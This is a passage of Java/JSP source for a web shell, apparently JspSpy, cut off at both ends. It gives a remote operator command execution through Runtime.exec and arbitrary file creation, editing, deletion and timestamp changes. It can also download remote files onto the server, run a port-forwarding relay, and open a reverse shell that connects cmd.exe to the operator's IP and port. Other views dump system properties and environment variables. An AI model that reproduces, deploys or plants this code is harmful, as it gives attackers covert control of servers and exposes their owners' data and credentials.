File(to))); byte[] d = new byte[1024]; int len = input.read(d); while(len != -1) { output.write(d,0,len); len = input.read(d); } output.close(); input.close(); JSession.setAttribute(MSG,"Copy File Success!"); response.sendRedirect(SHELL_NAME+"?o=index"); } catch (Exception e) { e.printStackTrace(); throw e ; } } } private static class BottomInvoker extends DefaultInvoker { public boolean doBefore() {return false;} public boolean doAfter() {return false;} public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{ try { response.getWriter().println("
\"padding:10px;border-bottom:1px solid #fff;border-top:1px solid #ddd;background:#eee;\">Copyright (C) 2009 All Rights Reserved."+ "
"
); } catch (Exception e) { e.printStackTrace(); throw e ; } } } private static class VCreateFileInvoker extends DefaultInvoker { public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{ try { PrintWriter out = response.getWriter(); String path = request.getParameter("filepath"); File f = new File(path); if (!f.isAbsolute()) { String oldPath = path; path = JSession.getAttribute(CURRENT_DIR).toString(); if (!path.endsWith("/")) path+="/"; path+=oldPath; f = new File(path); f.createNewFile(); } else { f.createNewFile(); } out.println("\"100%\" border=\"0\" cellpadding=\"15\" cellspacing=\"0\">
"+ "
\"form1\" id=\"form1\" action=\""+SHELL_NAME+"\" method=\"post\" >"+ "

Create / Edit File »

"
+ ""+ "

Current File (import new file name and new file)
\"input\" name=\"filepath\" id=\"editfilename\" value=\""+path+"\" type=\"text\" size=\"100\" />

"
+ "

File Content

"
+ "

\"bt\" name=\"submit\" id=\"submit\" type=\"submit\" value=\"Submit\"> \"bt\" type=\"button\" value=\"Back\" οnclick=\"history.back()\">

"
+ ""
+ "
"
); } catch (Exception e) { e.printStackTrace(); throw e ; } } } private static class VEditInvoker extends DefaultInvoker { public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{ try { PrintWriter out = response.getWriter(); String path = request.getParameter("filepath"); File f = new File(path); if (f.exists()) { BufferedReader reader = new BufferedReader(new FileReader(f)); StringBuilder content = new StringBuilder(); String s = reader.readLine(); while (s != null) { content.append(s+"\r\n"); s = reader.readLine(); } reader.close(); out.println("\"100%\" border=\"0\" cellpadding=\"15\" cellspacing=\"0\">
"+ "
\"form1\" id=\"form1\" action=\""+SHELL_NAME+"\" method=\"post\" >"+ "

Create / Edit File »

"
+ ""+ "

Current File (import new file name and new file)
\"input\" name=\"filepath\" id=\"editfilename\" value=\""+path+"\" type=\"text\" size=\"100\" />

"
+ "

File Content

"
+ "

\"bt\" name=\"submit\" id=\"submit\" type=\"submit\" value=\"Submit\"> \"bt\" type=\"button\" value=\"Back\" οnclick=\"history.back()\">

"
+ ""
+ "
"
); } } catch (Exception e) { e.printStackTrace(); throw e ; } } } private static class CreateFileInvoker extends DefaultInvoker { public boolean doBefore(){return false;} public boolean doAfter(){return false;} public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{ try { PrintWriter out = response.getWriter(); String path = request.getParameter("filepath"); String content = request.getParameter("filecontent"); BufferedWriter outs = new BufferedWriter(new FileWriter(new File(path))); outs.write(content,0,content.length()); outs.close(); JSession.setAttribute(MSG,"Save File Success!"); response.sendRedirect(SHELL_NAME+"?o=index"); } catch (Exception e) { e.printStackTrace(); throw e ; } } } private static class VEditPropertyInvoker extends DefaultInvoker { public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{ try { PrintWriter out = response.getWriter(); String filepath = request.getParameter("filepath"); File f = new File(filepath); if (!f.exists()) return; String read = f.canRead() ? "checked=\"checked\"" : ""; String write = f.canWrite() ? "checked=\"checked\"" : ""; String execute = f.canExecute() ? "checked=\"checked\"" : ""; Calendar cal = Calendar.getInstance(); cal.setTimeInMillis(f.lastModified()); out.println("\"100%\" border=\"0\" cellpadding=\"15\" cellspacing=\"0\">
"+ "
\"form1\" id=\"form1\" action=\""+SHELL_NAME+"\" method=\"post\" >"+ "

Set File Property »

"
+ "

Current file (fullpath)
\"input\" name=\"file\" id=\"file\" value=\""+request.getParameter("filepath")+"\" type=\"text\" size=\"120\" />

"
+ "\"hidden\" name=\"o\" value=\"editProperty\"> "+ "

Read: "+ " \"checkbox\" "+read+" name=\"read\" id=\"checkbox\"> "+ " Write: "+ " \"checkbox\" "+write+" name=\"write\" id=\"checkbox2\"> "+ " Execute: "+ " \"checkbox\" "+execute+" name=\"execute\" id=\"checkbox3\">"+ "

"
+ "

Instead »"+ "year:"+ "\"input\" name=\"year\" value="+cal.get(Calendar.YEAR)+" id=\"year\" type=\"text\" size=\"4\" />"+ "month:"+ "\"input\" name=\"month\" value="+(cal.get(Calendar.MONTH)+1)+" id=\"month\" type=\"text\" size=\"2\" />"+ "day:"+ "\"input\" name=\"date\" value="+cal.get(Calendar.DATE)+" id=\"date\" type=\"text\" size=\"2\" />"+ ""+ "hour:"+ "\"input\" name=\"hour\" value="+cal.get(Calendar.HOUR)+" id=\"hour\" type=\"text\" size=\"2\" />"+ "minute:"+ "\"input\" name=\"minute\" value="+cal.get(Calendar.MINUTE)+" id=\"minute\" type=\"text\" size=\"2\" />"+ "second:"+ "\"input\" name=\"second\" value="+cal.get(Calendar.SECOND)+" id=\"second\" type=\"text\" size=\"2\" />"+ "

"
+ "

\"bt\" name=\"submit\" value=\"Submit\" id=\"submit\" type=\"submit\" value=\"Submit\"> \"bt\" name=\"submit\" value=\"Back\" id=\"submit\" type=\"button\" οnclick=\"history.back()\">

"
+ ""
+ "
"
); } catch (Exception e) { e.printStackTrace(); throw e ; } } } private static class EditPropertyInvoker extends DefaultInvoker { public boolean doBefore(){return false;} public boolean doAfter(){return false;} public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{ try { String f = request.getParameter("file"); File file = new File(f); if (!file.exists()) return; String read = request.getParameter("read"); String write = request.getParameter("write"); String execute = request.getParameter("execute"); String year = request.getParameter("year"); String month = request.getParameter("month"); String date = request.getParameter("date"); String hour = request.getParameter("hour"); String minute = request.getParameter("minute"); String second = request.getParameter("second"); if (Util.isEmpty(read)) { file.setReadable(false); } else { file.setReadable(true); } if (Util.isEmpty(write)) { file.setWritable(false); } else { file.setWritable(true); } if (Util.isEmpty(execute)) { file.setExecutable(false); } else { file.setExecutable(true); } Calendar cal = Calendar.getInstance(); cal.set(Calendar.YEAR,Integer.parseInt(year)); cal.set(Calendar.MONTH,Integer.parseInt(month)-1); cal.set(Calendar.DATE,Integer.parseInt(date)); cal.set(Calendar.HOUR,Integer.parseInt(hour)); cal.set(Calendar.MINUTE,Integer.parseInt(minute)); cal.set(Calendar.SECOND,Integer.parseInt(second)); if(file.setLastModified(cal.getTimeInMillis())){ JSession.setAttribute(MSG,"Reset File Property Success!"); } else { JSession.setAttribute(MSG,"Reset File Property Failed!"); } response.sendRedirect(SHELL_NAME+"?o=index"); } catch (Exception e) { e.printStackTrace(); throw e ; } } } //VShell private static class VsInvoker extends DefaultInvoker{ public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{ try { PrintWriter out = response.getWriter(); String cmd = request.getParameter("command"); String program = request.getParameter("program"); if (cmd == null) cmd = "cmd.exe /c set"; if (program == null) program = "cmd.exe /c net start > "+SHELL_DIR+"/Log.txt"; if (JSession.getAttribute(MSG)!=null) { Util.outMsg(out,JSession.getAttribute(MSG).toString()); JSession.removeAttribute(MSG); } out.println("\"100%\" border=\"0\" cellpadding=\"15\" cellspacing=\"0\">"+ "
"+ "
\"form1\" id=\"form1\" action=\""+SHELL_NAME+"\" method=\"post\" >"+ "

Execute Program »

"
+ "

"+ "\"hidden\" name=\"o\" value=\"shell\">"+ "\"hidden\" name=\"type\" value=\"program\">"+ "Parameter
\"
input\" name=\"program\" id=\"program\" value=\""+program+"\" type=\"text\" size=\"100\" />"+ "\"bt\" name=\"submit\" id=\"submit\" value=\"Execute\" type=\"submit\" size=\"100\" />"+ "

"
+ ""
+ "
\"form1\" id=\"form1\" action=\""+SHELL_NAME+"\" method=\"post\" >"+ "

Execute Shell »

"
+ "

"+ "\"hidden\" name=\"o\" value=\"shell\">"+ "\"hidden\" name=\"type\" value=\"command\">"+ "Parameter
\"
input\" name=\"command\" id=\"command\" value=\""+cmd+"\" type=\"text\" size=\"100\" />"+ "\"bt\" name=\"submit\" id=\"submit\" value=\"Execute\" type=\"submit\" size=\"100\" />"+ "

"
+ ""
+ "
"
); } catch (Exception e) { e.printStackTrace(); throw e ; } } } private static class ShellInvoker extends DefaultInvoker{ public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{ try { PrintWriter out = response.getWriter(); String type = request.getParameter("type"); if (type.equals("command")) { ins.get("vs").invoke(request,response,JSession); out.println("

"); out.println("
");
                    String command = request.getParameter("command");
                    if (!Util.isEmpty(command)) {
                        Process pro = Runtime.getRuntime().exec(command);
                        BufferedReader reader = new BufferedReader(new InputStreamReader(pro.getInputStream()));
                        String s = reader.readLine();
                        while (s != null) {
                            out.println(Util.htmlEncode(Util.getStr(s)));
                            s = reader.readLine();
                        }
                        reader.close();
                        out.println("
"
); } } else { String program = request.getParameter("program"); if (!Util.isEmpty(program)) { Process pro = Runtime.getRuntime().exec(program); JSession.setAttribute(MSG,"Program Has Run Success!"); ins.get("vs").invoke(request,response,JSession); } } } catch (Exception e) { e.printStackTrace(); throw e ; } } } private static class DownInvoker extends DefaultInvoker{ public boolean doBefore(){return false;} public boolean doAfter(){return false;} public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{ try { String path = request.getParameter("path"); if (Util.isEmpty(path)) return; File f = new File(path); if (!f.exists()) return; response.setHeader("Content-Disposition","attachment;filename="+URLEncoder.encode(f.getName(),PAGE_CHARSET)); BufferedInputStream input = new BufferedInputStream(new FileInputStream(f)); BufferedOutputStream output = new BufferedOutputStream(response.getOutputStream()); byte[] data = new byte[1024]; int len = input.read(data); while (len != -1) { output.write(data,0,len); len = input.read(data); } input.close(); output.close(); } catch (Exception e) { e.printStackTrace(); throw e ; } } } //VDown private static class VdInvoker extends DefaultInvoker { public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{ try { PrintWriter out = response.getWriter(); String savepath = request.getParameter("savepath"); String url = request.getParameter("url"); if (Util.isEmpty(url)) url = "http://www.baidu.com/"; if (Util.isEmpty(savepath)) { savepath = JSession.getAttribute(CURRENT_DIR).toString(); } if (!Util.isEmpty(JSession.getAttribute("done"))) { Util.outMsg(out,"Download Remote File Success!"); JSession.removeAttribute("done"); } out.println("\"100%\" border=\"0\" cellpadding=\"15\" cellspacing=\"0\">
"+ "
\"form1\" id=\"form1\" action=\""+SHELL_NAME+"\" method=\"post\" >"+ "

Remote File DownLoad »

"
+ "

"+ "\"hidden\" name=\"o\" value=\"downRemote\">"+ "Remote File URL:"+ " \"input\" name=\"url\" value=\""+url+"\" id=\"url\" type=\"text\" size=\"70\" />"+ "Save Path:"+ "\"input\" name=\"savepath\" id=\"savepath\" value=\""+savepath+"\" type=\"text\" size=\"70\" />"+ "\"bt\" name=\"connect\" id=\"connect\" value=\"DownLoad\" type=\"submit\" size=\"100\" />"+ "

"
+ "
"
); } catch (Exception e) { e.printStackTrace(); throw e ; } } } private static class DownRemoteInvoker extends DefaultInvoker { public boolean doBefore(){return true;} public boolean doAfter(){return true;} public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{ try { String downFileUrl = request.getParameter("url"); String savePath = request.getParameter("savepath"); if (Util.isEmpty(downFileUrl) || Util.isEmpty(savePath)) return; URL downUrl = new URL(downFileUrl); URLConnection conn = downUrl.openConnection(); BufferedInputStream in = new BufferedInputStream(conn.getInputStream()); BufferedOutputStream out = new BufferedOutputStream(new FileOutputStream(new File(savePath))); byte[] data = new byte[1024]; int len = in.read(data); while (len != -1) { out.write(data,0,len); len = in.read(data); } in.close(); out.close(); JSession.setAttribute("done","d"); ins.get("vd").invoke(request,response,JSession); } catch (Exception e) { e.printStackTrace(); throw e ; } } } private static class IndexInvoker extends DefaultInvoker { public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{ try { ins.get("filelist").invoke(request,response,JSession); } catch (Exception e) { e.printStackTrace(); throw e ; } } } private static class MkDirInvoker extends DefaultInvoker { public boolean doBefore(){return false;} public boolean doAfter(){return false;} public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{ try { String name = request.getParameter("name"); File f = new File(name); if (!f.isAbsolute()) { String path = JSession.getAttribute(CURRENT_DIR).toString(); if (!path.endsWith("/")) path += "/"; path += name; f = new File(path); } f.mkdirs(); JSession.setAttribute(MSG,"Make Directory Success!"); response.sendRedirect(SHELL_NAME+"?o=index"); } catch (Exception e) { e.printStackTrace(); throw e ; } } } private static class MoveInvoker extends DefaultInvoker { public boolean doBefore(){return false;} public boolean doAfter(){return false;} public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{ try { PrintWriter out = response.getWriter(); String src = request.getParameter("src"); String target = request.getParameter("to"); if (!Util.isEmpty(target) && !Util.isEmpty(src)) { File file = new File(src); if(file.renameTo(new File(target))) { JSession.setAttribute(MSG,"Move File Success!"); } else { String msg = "Move File Failed!"; if (file.isDirectory()) { msg += "The Move Will Failed When The Directory Is Not Empty."; } JSession.setAttribute(MSG,msg); } response.sendRedirect(SHELL_NAME+"?o=index"); } } catch (Exception e) { e.printStackTrace(); throw e ; } } } private static class RemoteDirInvoker extends DefaultInvoker { public boolean doBefore(){return false;} public boolean doAfter(){return false;} public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{ try { String dir = request.getParameter("dir"); File file = new File(dir); if (file.exists()) { deleteFile(file); deleteDir(file); } JSession.setAttribute(MSG,"Remove Directory Success!"); response.sendRedirect(SHELL_NAME+"?o=index"); } catch (Exception e) { e.printStackTrace(); throw e ; } } public void deleteFile(File f) { if (f.isFile()) { f.delete(); }else { File[] list = f.listFiles(); for (File ff:list) { deleteFile(ff); } } } public void deleteDir(File f) { File[] list = f.listFiles(); if (list.length == 0) { f.delete(); } else { for (File ff:list) { deleteDir(ff); } deleteDir(f); } } } private static class PackBatchInvoker extends DefaultInvoker{ public boolean doBefore(){return false;} public boolean doAfter(){return false;} public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{ try { String files = request.getParameter("files"); if (Util.isEmpty(files)) return; String saveFileName = request.getParameter("savefilename"); File saveF = new File(JSession.getAttribute(CURRENT_DIR).toString(),saveFileName); if (saveF.exists()) { JSession.setAttribute(MSG,"The File \""+saveFileName+"\" Has Been Exists!"); response.sendRedirect(SHELL_NAME+"?o=index"); return; } ZipOutputStream zout = new ZipOutputStream(new BufferedOutputStream(new FileOutputStream(saveF))); String[] arr = files.split(","); for (String f:arr) { File pF = new File(JSession.getAttribute(CURRENT_DIR).toString(),f); ZipEntry entry = new ZipEntry(pF.getName()); zout.putNextEntry(entry); FileInputStream fInput = new FileInputStream(pF); int len = 0; byte[] buf = new byte[1024]; while ((len = fInput.read(buf)) != -1) { zout.write(buf, 0, len); zout.flush(); } fInput.close(); } zout.close(); JSession.setAttribute(MSG,"Pack Files Success!"); response.sendRedirect(SHELL_NAME+"?o=index"); } catch (Exception e) { e.printStackTrace(); throw e; } } } private static class PackInvoker extends DefaultInvoker { public boolean doBefore(){return false;} public boolean doAfter(){return false;} public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{ try { String packedFile = request.getParameter("packedfile"); if (Util.isEmpty(packedFile)) return; String saveFileName = request.getParameter("savefilename"); File saveF = new File(JSession.getAttribute(CURRENT_DIR).toString(),saveFileName); if (saveF.exists()) { JSession.setAttribute(MSG,"The File \""+saveFileName+"\" Has Been Exists!"); response.sendRedirect(SHELL_NAME+"?o=index"); return; } File pF = new File(packedFile); ZipOutputStream zout = new ZipOutputStream(new BufferedOutputStream(new FileOutputStream(saveF))); String base = ""; if (pF.isDirectory()) { zipDir(pF,base,zout); } else { zipFile(pF,base,zout); } zout.close(); JSession.setAttribute(MSG,"Pack File Success!"); response.sendRedirect(SHELL_NAME+"?o=index"); } catch (Exception e) { e.printStackTrace(); throw e; } } public void zipDir(File f,String base,ZipOutputStream zout) throws Exception { if (f.isDirectory()) { File[] arr = f.listFiles(); for (File ff:arr) { String tmpBase = base; if (!Util.isEmpty(tmpBase) && !tmpBase.endsWith("/")) tmpBase += "/"; zipDir(ff,tmpBase+f.getName(),zout); } } else { String tmpBase = base; if (!Util.isEmpty(tmpBase) &&!tmpBase.endsWith("/")) tmpBase += "/"; zipFile(f,tmpBase,zout); } } public void zipFile(File f,String base,ZipOutputStream zout) throws Exception{ ZipEntry entry = new ZipEntry(base+f.getName()); zout.putNextEntry(entry); FileInputStream fInput = new FileInputStream(f); int len = 0; byte[] buf = new byte[1024]; while ((len = fInput.read(buf)) != -1) { zout.write(buf, 0, len); zout.flush(); } fInput.close(); } } private static class UnPackInvoker extends DefaultInvoker { public boolean doBefore(){return false;} public boolean doAfter(){return false;} public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{ try { String savepath = request.getParameter("savepath"); String zipfile = request.getParameter("zipfile"); if (Util.isEmpty(savepath) || Util.isEmpty(zipfile)) return; File save = new File(savepath); save.mkdirs(); ZipFile file = new ZipFile(new File(zipfile)); Enumeration e = file.entries(); while (e.hasMoreElements()) { ZipEntry en = (ZipEntry) e.nextElement(); String entryPath = en.getName(); int index = entryPath.lastIndexOf("/"); if (index != -1) entryPath = entryPath.substring(0,index); File absEntryFile = new File(save,entryPath); if (!absEntryFile.exists() && (en.isDirectory() || en.getName().indexOf("/") != -1)) absEntryFile.mkdirs(); BufferedOutputStream output = null; BufferedInputStream input = null; try { output = new BufferedOutputStream( new FileOutputStream(new File(save,en.getName()))); input = new BufferedInputStream( file.getInputStream(en)); byte[] b = new byte[1024]; int len = input.read(b); while (len != -1) { output.write(b, 0, len); len = input.read(b); } } catch (Exception ex) { } finally { try { if (output != null) output.close(); if (input != null) input.close(); } catch (Exception ex1) { } } } file.close(); JSession.setAttribute(MSG,"Unzip File Success!"); response.sendRedirect(SHELL_NAME+"?o=index"); } catch (Exception e) { e.printStackTrace(); throw e ; } } } //VMapPort private static class VmpInvoker extends DefaultInvoker { public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{ try { PrintWriter out = response.getWriter(); Object localIP = JSession.getAttribute("localIP"); Object localPort = JSession.getAttribute("localPort"); Object remoteIP = JSession.getAttribute("remoteIP"); Object remotePort = JSession.getAttribute("remotePort"); Object done = JSession.getAttribute("done"); JSession.removeAttribute("localIP"); JSession.removeAttribute("localPort"); JSession.removeAttribute("remoteIP"); JSession.removeAttribute("remotePort"); JSession.removeAttribute("done"); if (Util.isEmpty(localIP)) localIP = InetAddress.getLocalHost().getHostAddress(); if (Util.isEmpty(localPort)) localPort = "3389"; if (Util.isEmpty(remoteIP)) remoteIP = "www.baidu.com"; if (Util.isEmpty(remotePort)) remotePort = "80"; if (!Util.isEmpty(done)) Util.outMsg(out,done.toString()); out.println("
\""+SHELL_NAME+"\" method=\"post\">"+ "\"hidden\" name=\"o\" value=\"mapPort\">"+ " \"100%\" border=\"0\" cellpadding=\"15\" cellspacing=\"0\">"+ " "+ " "+ ""+ "

\"Bin_H2_Title\">PortMap >>

"+ "
\"hOWTm\">"+ " \"100%\" border=\"0\" cellpadding=\"4\" cellspacing=\"0\" style=\"margin:10px 0;\">"+ " \"center\">"+ " "+ " "+ " "+ " "+ " "+ " "+ " \"center\">"+ " "+ " "+ "
\"width:5%\">\"width:20%\" align=\"left\">Local Ip :"+ " \"localIP\" id=\"localIP\" type=\"text\" class=\"input\" size=\"20\" value=\""+localIP+"\" />"+ " \"width:20%\" align=\"left\">Local Port :"+ " \"localPort\" id=\"localPort\" type=\"text\" class=\"input\" size=\"20\" value=\""+localPort+"\" />\"width:20%\" align=\"left\">Remote Ip :"+ " \"remoteIP\" id=\"remoteIP\" type=\"text\" class=\"input\" size=\"20\" value=\""+remoteIP+"\" />\"width:20%\" align=\"left\">Remote Port :"+ " \"remotePort\" id=\"remotePort\" type=\"text\" class=\"input\" size=\"20\" value=\""+remotePort+"\" />
\"5\">
"+ " \"submit\" name=\"FJE\" value=\"MapPort\" id=\"FJE\" class=\"bt\" />"+ " \"button\" name=\"giX\" value=\"ClearAll\" id=\"giX\" onClick=\"location.href='"+SHELL_NAME+"?o=smp'\" class=\"bt\" />"+ "
"
+ "
"
+ "
"
+ ""
); } catch (Exception e) { e.printStackTrace(); throw e ; } } } //StopMapPort private static class SmpInvoker extends DefaultInvoker { public boolean doAfter(){return true;} public boolean doBefore(){return true;} public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{ try { Object obj = JSession.getAttribute(PORT_MAP); if (obj != null) { ServerSocket server = (ServerSocket)JSession.getAttribute(PORT_MAP); server.close(); } JSession.setAttribute("done","Stop Success!"); ins.get("vmp").invoke(request,response,JSession); } catch (Exception e) { e.printStackTrace(); throw e ; } } } private static class MapPortInvoker extends DefaultInvoker { public boolean doBefore(){return false;} public boolean doAfter(){return false;} public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{ try { PrintWriter out = response.getWriter(); String localIP = request.getParameter("localIP"); String localPort = request.getParameter("localPort"); final String remoteIP = request.getParameter("remoteIP"); final String remotePort = request.getParameter("remotePort"); if (Util.isEmpty(localIP) || Util.isEmpty(localPort) || Util.isEmpty(remoteIP) || Util.isEmpty(remotePort)) return; Object obj = JSession.getAttribute(PORT_MAP); if (obj != null) { ServerSocket s = (ServerSocket)obj; s.close(); } final ServerSocket server = new ServerSocket(); server.bind(new InetSocketAddress(localIP,Integer.parseInt(localPort))); JSession.setAttribute(PORT_MAP,server); new Thread(new Runnable(){ public void run(){ while (true) { Socket soc = null; Socket remoteSoc = null; DataInputStream remoteIn = null; DataOutputStream remoteOut = null; DataInputStream localIn = null; DataOutputStream localOut = null; try{ soc = server.accept(); remoteSoc = new Socket(); remoteSoc.connect(new InetSocketAddress(remoteIP,Integer.parseInt(remotePort))); remoteIn = new DataInputStream(remoteSoc.getInputStream()); remoteOut = new DataOutputStream(remoteSoc.getOutputStream()); localIn = new DataInputStream(soc.getInputStream()); localOut = new DataOutputStream(soc.getOutputStream()); this.readFromLocal(localIn,remoteOut); this.readFromRemote(soc,remoteSoc,remoteIn,localOut); }catch(Exception ex) { break; } } } public void readFromLocal(final DataInputStream localIn,final DataOutputStream remoteOut){ new Thread(new Runnable(){ public void run(){ while (true) { try{ byte[] data = new byte[100]; int len = localIn.read(data); while (len != -1) { remoteOut.write(data,0,len); len = localIn.read(data); } }catch (Exception e) { break; } } } }).start(); } public void readFromRemote(final Socket soc,final Socket remoteSoc,final DataInputStream remoteIn,final DataOutputStream localOut){ new Thread(new Runnable(){ public void run(){ while(true) { try{ byte[] data = new byte[100]; int len = remoteIn.read(data); while (len != -1) { localOut.write(data,0,len); len = remoteIn.read(data); } }catch (Exception e) { try{ soc.close(); remoteSoc.close(); }catch(Exception ex) { } break; } } } }).start(); } }).start(); JSession.setAttribute("done","Map Port Success!"); JSession.setAttribute("localIP",localIP); JSession.setAttribute("localPort",localPort); JSession.setAttribute("remoteIP",remoteIP); JSession.setAttribute("remotePort",remotePort); response.sendRedirect(SHELL_NAME+"?o=vmp"); } catch (Exception e) { e.printStackTrace(); throw e ; } } } //VBackConnect private static class VbcInvoker extends DefaultInvoker { public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{ try { PrintWriter out = response.getWriter(); Object ip = JSession.getAttribute("ip"); Object port = JSession.getAttribute("port"); Object program = JSession.getAttribute("program"); Object done = JSession.getAttribute("done"); JSession.removeAttribute("ip"); JSession.removeAttribute("port"); JSession.removeAttribute("program"); JSession.removeAttribute("done"); if (Util.isEmpty(ip)) ip = request.getRemoteAddr(); if (Util.isEmpty(port) || !Util.isInteger(port.toString())) port = "4444"; if (Util.isEmpty(program)) program = "cmd.exe"; if (!Util.isEmpty(done)) Util.outMsg(out,done.toString()); out.println("
\""+SHELL_NAME+"\" method=\"post\">"+ "\"hidden\" name=\"o\" value=\"backConnect\">"+ " \"100%\" border=\"0\" cellpadding=\"15\" cellspacing=\"0\">"+ " "+ " "+ ""+ "

\"Bin_H2_Title\">Back Connect >>

"+ "
\"hOWTm\">"+ " \"100%\" border=\"0\" cellpadding=\"4\" cellspacing=\"0\" style=\"margin:10px 0;\">"+ " \"center\">"+ " "+ " "+ " "+ " \"center\">"+ " "+ " "+ "
\"width:5%\">\"center\">Your Ip :"+ " \"ip\" id=\"ip\" type=\"text\" class=\"input\" size=\"20\" value=\""+ip+"\" />"+ " Your Port :"+ " \"port\" id=\"port\" type=\"text\" class=\"input\" size=\"20\" value=\""+port+"\" />Program To Back :"+ " \"program\" id=\"program\" type=\"text\" value=\""+program+"\" class=\"input\" size=\"20\" value=\"d\" />
\"2\">
"+ " \"submit\" name=\"FJE\" value=\"Connect\" id=\"FJE\" class=\"bt\" />"+ "
"
+ "
"
+ "
"
+ ""
); } catch (Exception e) { e.printStackTrace(); throw e ; } } } private static class BackConnectInvoker extends DefaultInvoker { public boolean doAfter(){return false;} public boolean doBefore(){return false;} public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{ try { String ip = request.getParameter("ip"); String port = request.getParameter("port"); String program = request.getParameter("program"); if (Util.isEmpty(ip) || Util.isEmpty(program) || !Util.isInteger(port)) return; Socket socket = new Socket(ip,Integer.parseInt(port)); Process process = Runtime.getRuntime().exec(program); (new StreamConnector(process.getInputStream(), socket.getOutputStream())).start(); (new StreamConnector(socket.getInputStream(), process.getOutputStream())).start(); JSession.setAttribute("done","Back Connect Success!"); JSession.setAttribute("ip",ip); JSession.setAttribute("port",port); JSession.setAttribute("program",program); response.sendRedirect(SHELL_NAME+"?o=vbc"); } catch (Exception e) { e.printStackTrace(); throw e ; } } } private static class JspEnvInvoker extends DefaultInvoker { public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{ try { PrintWriter out = response.getWriter(); out.println("\"100%\" border=\"0\" cellpadding=\"15\" cellspacing=\"0\">"+ " "+ " "+ " "+ "

\"Ninty_H2_Title\">System Properties >>

"+ "
\"ghaB\">"+ "
\"
border: 1px solid #ddd;height:0px;\"/>"+ "
    \"Ninty_Ul_Sys\" class=\"info\">"); Properties pro = System.getProperties(); Enumeration names = pro.propertyNames(); while (names.hasMoreElements()){ String name = (String)names.nextElement(); out.println("
  • "+Util.htmlEncode(name)+" : "+Util.htmlEncode(pro.getProperty(name))+"
  • "
    ); } out.println("

\"Ninty_H2_Mac\">System Environment >>


\"
border: 1px solid #ddd;height:0px;\"/>
    \"Ninty_Ul_Sys\" class=\"info\">"); Map<String,String> envs = System.getenv(); Set<Map.Entry<String,String>> entrySet = envs.entrySet(); for (Map.Entry<String,String> en:entrySet) { out.println("
  • "+Util.htmlEncode(en.getKey())+" : "+Util.htmlEncode(en.getValue())+"
  • "
    ); } out.println("
"
); } catch (Exception e) { e.printStackTrace(); throw e ; } } } private static class TopInvoker extends DefaultInvoker { public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{ try { PrintWriter out = response.getWriter(); out.println("
\""+SHELL_NAME+"\" method=\"post\" name=\"doForm\">"
+ "\"100%\" border=\"0\" cellpadding=\"0\" cellspacing=\"0\">"+ " \"head\">"+ " "+ " "+ " \"alt1\">"+ " "+ "
\"float:right;\">\"http://www.baidu.com\" target=\"_blank\">JspSpy Ver: 2009"+request.getHeader("host")+" ("+InetAddress.getLocalHost().getHostAddress()+")
\"javascript:doPost({o:'logout'});\">Logout | "+ " \"javascript:doPost({o:'fileList'});\">File Manager | "+ " \"javascript:doPost({o:'vConn'});\">DataBase Manager | "+ " \"javascript:doPost({o:'vs'});\">Execute Command | "+ " \"javascript:doPost({o:'vso'});\">Shell OnLine | "+ " \"javascript:doPost({o:'vbc'});\">Back Connect | "+ " \"javascript:doPost({o:'vPortScan'});;\">Port Scan | "+ " \"javascript:doPost({o:'vd'});\">Download Remote File | "+ " \"javascript:;doPost({o:'clipboard'});\">ClipBoard | "+ " \"javascript:doPost({o:'vRemoteControl'});\">Remote Control | "+ " \"javascript:doPost({o:'vmp'});\">Port Map | "+ " \"javascript:doPost({o:'jspEnv'});\">JSP Env "+ "
"
); if (JSession.getAttribute(MSG) != null) { Util.outMsg(out,JSession.getAttribute(MSG).toString()); JSession.removeAttribute(MSG); } } catch (Exception e) { e.printStackTrace(); throw e ; } } } private static class VOnLineShellInvoker extends DefaultInvoker { public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{ try { PrintWriter out = response.getWriter(); out.println(""); out.println("\"100%\" border=\"0\" cellpadding=\"15\" cellspacing=\"0\">"+ " "+ " "+ " "+ "
"); out.println("

Shell OnLine »


"
); out.println("
\""+SHELL_NAME+"\" method=\"post\" target=\"echo\" οnsubmit=\"$('cmd').focus()\">"+ " \"submit\" value=\" start \" class=\"bt\">"+ " \"text\" name=\"exe\" style=\"width:300px\" class=\"input\" value=\"c:\\windows\\system32\\cmd.exe\"/>"+ " \"hidden\" name=\"o\" value=\"online\"/>\"hidden\" name=\"type\" value=\"start\"/>\"tip\">Notice ! If You Are Using IE , You Must Input A Command First After You Start Or You Will Not See The Echo"+ " "
+ "
"
+ " "+ "
